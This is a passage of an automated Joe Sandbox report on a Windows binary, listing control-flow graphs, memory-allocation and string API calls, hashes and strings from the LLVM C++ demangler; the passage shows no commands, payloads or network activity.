                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Parser->TemplateParams.size() >= OldNumTemplateParamLists$yptn
                                      • API String ID: 2460331008-2552725819
                                      • Opcode ID: 0c80bad6e972a27b6348764f3f0f3f2045ecc6d1aad5778c6820c893f99cd668
                                      • Instruction ID: 8ab4889d9299dd3c63653fad6a49c6478f95cd8e7f607faa89a9dccdda58b5ca
                                      • Opcode Fuzzy Hash: 0c80bad6e972a27b6348764f3f0f3f2045ecc6d1aad5778c6820c893f99cd668
                                      • Instruction Fuzzy Hash: 88E1C47261AB8286EA64CF11E8443BA77A5FB44B80F694535DF8D87792EF3CE541C300

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1701 7ff6099c2df3-7ff6099c2e04 1702 7ff6099c2fd1 1701->1702 1703 7ff6099c2e0a-7ff6099c2e16 isxdigit 1701->1703 1705 7ff6099c2fd3-7ff6099c2fe2 1702->1705 1703->1702 1704 7ff6099c2e1c-7ff6099c2e28 isxdigit 1703->1704 1704->1702 1706 7ff6099c2e2e-7ff6099c2e3a isxdigit 1704->1706 1706->1702 1707 7ff6099c2e40-7ff6099c2e4c isxdigit 1706->1707 1707->1702 1708 7ff6099c2e52-7ff6099c2e5e isxdigit 1707->1708 1708->1702 1709 7ff6099c2e64-7ff6099c2e70 isxdigit 1708->1709 1709->1702 1710 7ff6099c2e76-7ff6099c2e82 isxdigit 1709->1710 1710->1702 1711 7ff6099c2e88-7ff6099c2e94 isxdigit 1710->1711 1711->1702 1712 7ff6099c2e9a-7ff6099c2ea6 isxdigit 1711->1712 1712->1702 1713 7ff6099c2eac-7ff6099c2eb8 isxdigit 1712->1713 1713->1702 1714 7ff6099c2ebe-7ff6099c2eca isxdigit 1713->1714 1714->1702 1715 7ff6099c2ed0-7ff6099c2edc isxdigit 1714->1715 1715->1702 1716 7ff6099c2ee2-7ff6099c2eee isxdigit 1715->1716 1716->1702 1717 7ff6099c2ef4-7ff6099c2f00 isxdigit 1716->1717 1717->1702 1718 7ff6099c2f06-7ff6099c2f12 isxdigit 1717->1718 1718->1702 1719 7ff6099c2f18-7ff6099c2f24 isxdigit 1718->1719 1719->1702 1720 7ff6099c2f2a-7ff6099c2f34 1719->1720 1720->1702 1721 7ff6099c2f3a-7ff6099c2f3d 1720->1721 1721->1702 1722 7ff6099c2f43-7ff6099c2f62 1721->1722 1723 7ff6099c2f8e-7ff6099c2fcf 1722->1723 1724 7ff6099c2f64-7ff6099c2f71 malloc 1722->1724 1723->1702 1723->1705 1725 7ff6099c3080-7ff6099c3085 call 7ff6099b2d30 1724->1725 1726 7ff6099c2f77-7ff6099c2f8b 1724->1726 1726->1723
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: isxdigit$malloc
                                      • String ID:
                                      • API String ID: 1399014089-0
                                      • Opcode ID: 7f82570470b9a3b9cecc052cb3018d2ab878e44e7211999c67834c7bc2493845
                                      • Instruction ID: 18d52f64dd06d23c615566493d5940cfe83d6e5db3aace83436addab33cccdfb
                                      • Opcode Fuzzy Hash: 7f82570470b9a3b9cecc052cb3018d2ab878e44e7211999c67834c7bc2493845
                                      • Instruction Fuzzy Hash: DE51936160CB8642F7594F249D9033E67A1BF40F41F6C4435CA6DC6BA6EF6CE5A0D210

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1729 7ff6099c82a0-7ff6099c82e0 1730 7ff6099c82e2-7ff6099c82ef malloc 1729->1730 1731 7ff6099c830d-7ff6099c8354 1729->1731 1732 7ff6099c82f5-7ff6099c830a 1730->1732 1733 7ff6099c8416-7ff6099c8433 call 7ff6099b2d30 1730->1733 1734 7ff6099c835a-7ff6099c8368 1731->1734 1735 7ff6099c83fc-7ff6099c8410 _assert 1731->1735 1732->1731 1743 7ff6099c8495-7ff6099c84ab 1733->1743 1744 7ff6099c8435-7ff6099c8438 1733->1744 1737 7ff6099c836a-7ff6099c8380 1734->1737 1738 7ff6099c83d7-7ff6099c83fb 1734->1738 1735->1733 1740 7ff6099c8382-7ff6099c8394 realloc 1737->1740 1741 7ff6099c8398-7ff6099c83a3 malloc 1737->1741 1745 7ff6099c83bf-7ff6099c83d2 1740->1745 1746 7ff6099c8396 1740->1746 1741->1733 1742 7ff6099c83a5-7ff6099c83ab 1741->1742 1749 7ff6099c83bb 1742->1749 1750 7ff6099c83ad-7ff6099c83b6 memcpy 1742->1750 1747 7ff6099c84ad-7ff6099c84d0 realloc 1743->1747 1748 7ff6099c84d9-7ff6099c84e9 1743->1748 1751 7ff6099c843e-7ff6099c8440 1744->1751 1752 7ff6099c84eb-7ff6099c8501 1744->1752 1745->1738 1746->1733 1753 7ff6099c85f1-7ff6099c85f6 call 7ff6099b2d30 1747->1753 1754 7ff6099c84d6 1747->1754 1755 7ff6099c853a 1748->1755 1749->1745 1750->1749 1758 7ff6099c853d-7ff6099c8542 1751->1758 1759 7ff6099c8446-7ff6099c845c 1751->1759 1756 7ff6099c8503-7ff6099c8526 realloc 1752->1756 1757 7ff6099c852f 1752->1757 1754->1748 1755->1758 1756->1753 1761 7ff6099c852c 1756->1761 1762 7ff6099c8535 1757->1762 1763 7ff6099c8548-7ff6099c8556 1758->1763 1764 7ff6099c85e9-7ff6099c85f0 1758->1764 1765 7ff6099c845e-7ff6099c8481 realloc 1759->1765 1766 7ff6099c848a-7ff6099c8490 1759->1766 1761->1757 1762->1755 1768 7ff6099c8560-7ff6099c8589 1763->1768 1765->1753 1769 7ff6099c8487 1765->1769 1766->1762 1768->1768 1770 7ff6099c858b-7ff6099c858e 1768->1770 1769->1766 1770->1764 1771 7ff6099c8590-7ff6099c85a4 1770->1771 1772 7ff6099c85cf-7ff6099c85e5 memcpy 1771->1772 1773 7ff6099c85a6-7ff6099c85c9 realloc 1771->1773 1772->1764 1773->1753 1774 7ff6099c85cb 1773->1774 1774->1772
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc$mallocmemcpy$_assert
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Last != First && "Calling back() on empty vector!"$yptn
                                      • API String ID: 3355138791-4068048850
                                      • Opcode ID: 4d44fd90ec9d97f9a4df74b2dd578239c104db6aa568a6ee0de0dbe9cbb52ee8
                                      • Instruction ID: ff57d4e5732323a1cbe3f27bcb832a3e0dc9785809c356e97159834e062284c6
                                      • Opcode Fuzzy Hash: 4d44fd90ec9d97f9a4df74b2dd578239c104db6aa568a6ee0de0dbe9cbb52ee8
                                      • Instruction Fuzzy Hash: CF91E5B2A05B8682EA25CF16E99467D73A6EB587C0F588531DF8D87792EF3CE541C300

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1775 7ff6099cf790-7ff6099cf7a7 1776 7ff6099cf7e2-7ff6099cf802 1775->1776 1777 7ff6099cf7a9-7ff6099cf7b1 1775->1777 1781 7ff6099cf804-7ff6099cf807 1776->1781 1782 7ff6099cf81d-7ff6099cf82f 1776->1782 1777->1776 1778 7ff6099cf7b3-7ff6099cf7b8 1777->1778 1778->1776 1779 7ff6099cf7ba-7ff6099cf7dc 1778->1779 1779->1776 1783 7ff6099cf959-7ff6099cf96f 1779->1783 1784 7ff6099cf866-7ff6099cf875 1781->1784 1785 7ff6099cf809-7ff6099cf81b 1781->1785 1786 7ff6099cf85e-7ff6099cf862 1782->1786 1787 7ff6099cf831-7ff6099cf854 realloc 1782->1787 1788 7ff6099cf971-7ff6099cf994 realloc 1783->1788 1789 7ff6099cf99d-7ff6099cf9b9 1783->1789 1794 7ff6099cf8bb-7ff6099cf8cd 1784->1794 1795 7ff6099cf877-7ff6099cf87a 1784->1795 1785->1782 1785->1784 1786->1784 1792 7ff6099cfa4f-7ff6099cfa74 call 7ff6099b2d30 1787->1792 1793 7ff6099cf85a 1787->1793 1788->1792 1796 7ff6099cf99a 1788->1796 1790 7ff6099cfa0e-7ff6099cfa1c 1789->1790 1791 7ff6099cf9bb-7ff6099cf9cd 1789->1791 1802 7ff6099cfa1e-7ff6099cfa41 realloc 1790->1802 1803 7ff6099cfa46-7ff6099cfa4a 1790->1803 1797 7ff6099cf9cf-7ff6099cf9f2 realloc 1791->1797 1798 7ff6099cf9f7-7ff6099cfa0b memcpy 1791->1798 1817 7ff6099cfaaf-7ff6099cfaba 1792->1817 1818 7ff6099cfa76-7ff6099cfa7e 1792->1818 1793->1786 1800 7ff6099cf8cf-7ff6099cf8f2 realloc 1794->1800 1801 7ff6099cf8fc-7ff6099cf900 1794->1801 1805 7ff6099cf87c-7ff6099cf88e 1795->1805 1806 7ff6099cf898-7ff6099cf89d 1795->1806 1796->1789 1797->1792 1807 7ff6099cf9f4 1797->1807 1798->1790 1800->1792 1808 7ff6099cf8f8 1800->1808 1810 7ff6099cf904-7ff6099cf91a 1801->1810 1802->1792 1809 7ff6099cfa43 1802->1809 1811 7ff6099cf94c-7ff6099cf958 1803->1811 1805->1794 1822 7ff6099cf890-7ff6099cf894 1805->1822 1806->1794 1813 7ff6099cf89f-7ff6099cf8a5 1806->1813 1807->1798 1808->1801 1809->1803 1815 7ff6099cf91c-7ff6099cf93f realloc 1810->1815 1816 7ff6099cf948 1810->1816 1813->1810 1814 7ff6099cf8a7-7ff6099cf8b9 1813->1814 1814->1794 1814->1810 1815->1792 1820 7ff6099cf945 1815->1820 1816->1811 1823 7ff6099cfb00-7ff6099cfb12 1817->1823 1824 7ff6099cfabc-7ff6099cfabf 1817->1824 1818->1817 1821 7ff6099cfa80-7ff6099cfa85 1818->1821 1820->1816 1821->1817 1830 7ff6099cfa87-7ff6099cfaa9 1821->1830 1822->1806 1828 7ff6099cfb14-7ff6099cfb37 realloc 1823->1828 1829 7ff6099cfb3d-7ff6099cfb41 1823->1829 1825 7ff6099cfac1-7ff6099cfad3 1824->1825 1826 7ff6099cfadd-7ff6099cfae2 1824->1826 1825->1823 1840 7ff6099cfad5-7ff6099cfad9 1825->1840 1826->1823 1831 7ff6099cfae4-7ff6099cfaea 1826->1831 1832 7ff6099cfb6b-7ff6099cfb70 call 7ff6099b2d30 1828->1832 1833 7ff6099cfb39 1828->1833 1834 7ff6099cfb45-7ff6099cfb5f 1829->1834 1830->1817 1835 7ff6099cfb63-7ff6099cfb6a 1830->1835 1831->1834 1838 7ff6099cfaec-7ff6099cfafe 1831->1838 1833->1829 1834->1835 1838->1823 1838->1834 1840->1826
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc$memcpy
                                      • String ID: c_object$c_object$objc_obj$objc_obj
                                      • API String ID: 1833655766-1179801904
                                      • Opcode ID: 68cd87f9df8f5cfa69a5d2627882f52522deb85eface613025237f93cf7fe6bf
                                      • Instruction ID: 5bc437fdef0ad834acf24b7aee68dc9f11196fca3cae1cef050b0b979b943688
                                      • Opcode Fuzzy Hash: 68cd87f9df8f5cfa69a5d2627882f52522deb85eface613025237f93cf7fe6bf
                                      • Instruction Fuzzy Hash: 50C120E6A05B4582EF65CF16E99426967A3EB55FC0F688831CB8D87796DF3CD841C300

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1842 7ff6099d7f20-7ff6099d7f8d memset 1843 7ff6099d7f93-7ff6099d7fd1 1842->1843 1844 7ff6099d8191-7ff6099d81b0 memset 1842->1844 1845 7ff6099d7ff3-7ff6099d8000 1843->1845 1846 7ff6099d8362-7ff6099d839d call 7ff6099b1370 1844->1846 1847 7ff6099d81b6-7ff6099d81bd 1844->1847 1849 7ff6099d8002-7ff6099d8008 1845->1849 1850 7ff6099d800a-7ff6099d8021 memset 1845->1850 1851 7ff6099d81bf-7ff6099d81f2 1846->1851 1859 7ff6099d83a3 1846->1859 1847->1851 1852 7ff6099d81f9-7ff6099d82f8 wcscpy wcscat wcslen call 7ff6099b1422 1847->1852 1849->1850 1854 7ff6099d7fe0 1849->1854 1855 7ff6099d814b-7ff6099d8186 call 7ff6099b1370 1850->1855 1856 7ff6099d8027-7ff6099d802e 1850->1856 1851->1852 1866 7ff6099d8335-7ff6099d8361 1852->1866 1867 7ff6099d82fa-7ff6099d8330 call 7ff6099b1431 call 7ff6099b145e 1852->1867 1860 7ff6099d7fe6-7ff6099d7fed 1854->1860 1862 7ff6099d8030-7ff6099d805c 1855->1862 1870 7ff6099d818c 1855->1870 1861 7ff6099d8063-7ff6099d812e wcscpy wcscat wcslen call 7ff6099b1422 1856->1861 1856->1862 1859->1852 1860->1844 1860->1845 1871 7ff6099d8130-7ff6099d8135 call 7ff6099b145e 1861->1871 1872 7ff6099d813a-7ff6099d8143 1861->1872 1862->1861 1867->1866 1870->1861 1871->1872 1872->1860 1876 7ff6099d8149 1872->1876 1876->1844
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: memset$wcscatwcscpywcslen
                                      • String ID: $0$0$@$@
                                      • API String ID: 4263182637-1413854666
                                      • Opcode ID: cdbdf97fc269be1a0d164d62ed342f19875fa9a7fd4d8a48898fd4e855d17c00
                                      • Instruction ID: dfffeaaebf4036b48d9c5ba08adec42a1ae3d9641550e356bfdf256baa3a79ce
                                      • Opcode Fuzzy Hash: cdbdf97fc269be1a0d164d62ed342f19875fa9a7fd4d8a48898fd4e855d17c00
                                      • Instruction Fuzzy Hash: C2B1C16191E6C285F3208F25E8553BA77A1FF84344F681135EA8D92BA6DF7DE185CB00

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1877 7ff6099cca90-7ff6099ccaaf 1878 7ff6099ccac1-7ff6099ccac4 1877->1878 1879 7ff6099ccab1-7ff6099ccab4 1877->1879 1881 7ff6099ccaf5 1878->1881 1882 7ff6099ccac6-7ff6099ccac9 1878->1882 1879->1878 1880 7ff6099ccab6-7ff6099ccabc 1879->1880 1880->1878 1883 7ff6099ccaf8-7ff6099ccb02 1881->1883 1884 7ff6099ccad4-7ff6099ccad7 1882->1884 1885 7ff6099ccacb-7ff6099ccad1 1882->1885 1888 7ff6099ccb04-7ff6099ccb07 1883->1888 1889 7ff6099ccb1b-7ff6099ccb24 1883->1889 1886 7ff6099ccb0c-7ff6099ccb19 1884->1886 1887 7ff6099ccad9-7ff6099ccadc 1884->1887 1885->1884 1886->1888 1886->1889 1887->1883 1890 7ff6099ccade-7ff6099ccaf1 1887->1890 1891 7ff6099cccc8-7ff6099cccd9 1888->1891 1892 7ff6099ccc35-7ff6099ccc54 1889->1892 1893 7ff6099ccb2a-7ff6099ccb33 1889->1893 1890->1888 1894 7ff6099ccaf3 1890->1894 1899 7ff6099cccea-7ff6099ccced 1891->1899 1900 7ff6099cccdb-7ff6099ccce4 1891->1900 1897 7ff6099ccc80-7ff6099cccbf 1892->1897 1898 7ff6099ccc56-7ff6099ccc63 malloc 1892->1898 1895 7ff6099cce88-7ff6099cce9a call 7ff6099c0a70 1893->1895 1896 7ff6099ccb39-7ff6099ccb42 1893->1896 1894->1889 1902 7ff6099ccf44 1895->1902 1914 7ff6099ccea0-7ff6099cceaa 1895->1914 1896->1888 1903 7ff6099ccb44-7ff6099ccb61 1896->1903 1897->1891 1904 7ff6099cd0db-7ff6099cd0e0 call 7ff6099b2d30 1898->1904 1905 7ff6099ccc69-7ff6099ccc7d 1898->1905 1901 7ff6099cccf3-7ff6099cccf6 1899->1901 1899->1902 1900->1899 1907 7ff6099cce73-7ff6099cce7d 1900->1907 1901->1902 1909 7ff6099cccfc-7ff6099ccd06 1901->1909 1910 7ff6099ccf46-7ff6099ccf59 1902->1910 1912 7ff6099ccbbe-7ff6099ccbc1 1903->1912 1905->1897 1907->1901 1913 7ff6099cce83 1907->1913 1915 7ff6099ccd14-7ff6099ccd1f call 7ff6099bba60 1909->1915 1916 7ff6099ccd08-7ff6099ccd0b 1909->1916 1918 7ff6099ccbc3-7ff6099ccbc6 1912->1918 1919 7ff6099ccbcc-7ff6099ccbd7 call 7ff6099bba60 1912->1919 1913->1902 1914->1902 1922 7ff6099cceb0-7ff6099cceb3 1914->1922 1915->1902 1932 7ff6099ccd25-7ff6099ccd4f 1915->1932 1916->1915 1923 7ff6099ccd0d-7ff6099ccd11 1916->1923 1918->1919 1920 7ff6099ccf68-7ff6099ccf96 call 7ff6099bd9a0 1918->1920 1919->1910 1929 7ff6099ccbdd-7ff6099ccbe8 1919->1929 1939 7ff6099cd095 1920->1939 1940 7ff6099ccf9c-7ff6099ccfad malloc 1920->1940 1922->1902 1926 7ff6099cceb9-7ff6099cced7 1922->1926 1923->1915 1930 7ff6099ccf03-7ff6099ccf3f 1926->1930 1931 7ff6099cced9-7ff6099ccee6 malloc 1926->1931 1934 7ff6099ccbaa-7ff6099ccbba 1929->1934 1935 7ff6099ccbea-7ff6099ccbff 1929->1935 1930->1891 1931->1904 1936 7ff6099cceec-7ff6099ccf00 1931->1936 1937 7ff6099ccd72-7ff6099ccd75 1932->1937 1938 7ff6099ccd51 1932->1938 1934->1912 1941 7ff6099ccc05-7ff6099ccc10 malloc 1935->1941 1942 7ff6099ccb70-7ff6099ccb7f realloc 1935->1942 1936->1930 1945 7ff6099ccf5a-7ff6099ccf61 1937->1945 1946 7ff6099ccd7b-7ff6099ccd7e 1937->1946 1944 7ff6099ccde2-7ff6099ccde9 1938->1944 1943 7ff6099cd099-7ff6099cd0d6 1939->1943 1940->1904 1947 7ff6099ccfb3-7ff6099ccfca 1940->1947 1941->1904 1950 7ff6099ccc16-7ff6099ccc1c 1941->1950 1942->1904 1952 7ff6099ccb85-7ff6099ccba6 1942->1952 1943->1891 1948 7ff6099cce0e-7ff6099cce19 call 7ff6099bba60 1944->1948 1949 7ff6099ccdeb-7ff6099ccdf9 1944->1949 1951 7ff6099ccfd2-7ff6099cd005 call 7ff6099bd9a0 1945->1951 1946->1944 1953 7ff6099ccd80 1946->1953 1947->1943 1948->1910 1966 7ff6099cce1f-7ff6099cce2a 1948->1966 1954 7ff6099ccf63-7ff6099ccf66 1949->1954 1955 7ff6099ccdff-7ff6099cce08 1949->1955 1958 7ff6099ccc1e-7ff6099ccc27 memcpy 1950->1958 1959 7ff6099ccc2c-7ff6099ccc30 1950->1959 1964 7ff6099cd031-7ff6099cd090 1951->1964 1965 7ff6099cd007-7ff6099cd014 malloc 1951->1965 1952->1934 1953->1937 1953->1944 1954->1951 1955->1948 1961 7ff6099ccfcf 1955->1961 1958->1959 1959->1952 1961->1951 1964->1910 1965->1904 1967 7ff6099cd01a-7ff6099cd02e 1965->1967 1968 7ff6099ccdca-7ff6099ccde0 1966->1968 1969 7ff6099cce2c-7ff6099cce3d 1966->1969 1967->1964 1968->1937 1968->1944 1970 7ff6099cce43-7ff6099cce4e malloc 1969->1970 1971 7ff6099ccd90-7ff6099ccd9f realloc 1969->1971 1970->1904 1972 7ff6099cce54-7ff6099cce5a 1970->1972 1971->1904 1973 7ff6099ccda5-7ff6099ccdc6 1971->1973 1974 7ff6099cce6a-7ff6099cce6e 1972->1974 1975 7ff6099cce5c-7ff6099cce65 memcpy 1972->1975 1973->1968 1974->1973 1975->1974
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: malloc$memcpy
                                      • String ID: noexcept
                                      • API String ID: 3800483350-1409219070
                                      • Opcode ID: 23c07888132c1ba9a5abca388b04d8f54e5c1515e0ee32ea7d1c2d187f81c89b
                                      • Instruction ID: 6549a62d7e2a40ec9f360e46b9284cd341bb2435d404df7743a0452c700e172a
                                      • Opcode Fuzzy Hash: 23c07888132c1ba9a5abca388b04d8f54e5c1515e0ee32ea7d1c2d187f81c89b
                                      • Instruction Fuzzy Hash: B60294B260AB4586EB618F15E8442797BA6FB44B80F6C4935DBCE87792EF3CE551C300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                      • String ID: 0$X$`
                                      • API String ID: 329590056-2527496196
                                      • Opcode ID: 45aed35eb9f863044d84302e0661416d15cae368e09a4d5212cccfba54d1e7ac
                                      • Instruction ID: 44dc3ad06015b0fd83d2a6c445da76cd84efdaccdc011af108f0fbfa951412bf
                                      • Opcode Fuzzy Hash: 45aed35eb9f863044d84302e0661416d15cae368e09a4d5212cccfba54d1e7ac
                                      • Instruction Fuzzy Hash: 71029F3291EBC181E7208F19E8803AA77A2FB85754F684235DA9D87BE6DF7DE145C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: restric$ volatil
                                      • API String ID: 471065373-3617781792
                                      • Opcode ID: 04e3ec345cb3c778bbf34f95bdb079c4d89fbdfe26ba5954cde4d1f3c9909d39
                                      • Instruction ID: 691c74187a17b51aecf37a27e0315ba26d756ee4e7ffe91341667c6506b6e6a4
                                      • Opcode Fuzzy Hash: 04e3ec345cb3c778bbf34f95bdb079c4d89fbdfe26ba5954cde4d1f3c9909d39
                                      • Instruction Fuzzy Hash: 95B140B3A06B8683EE29CF56E55426DB362EB54BC4F548431CB9E477A1EF3CE5518300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
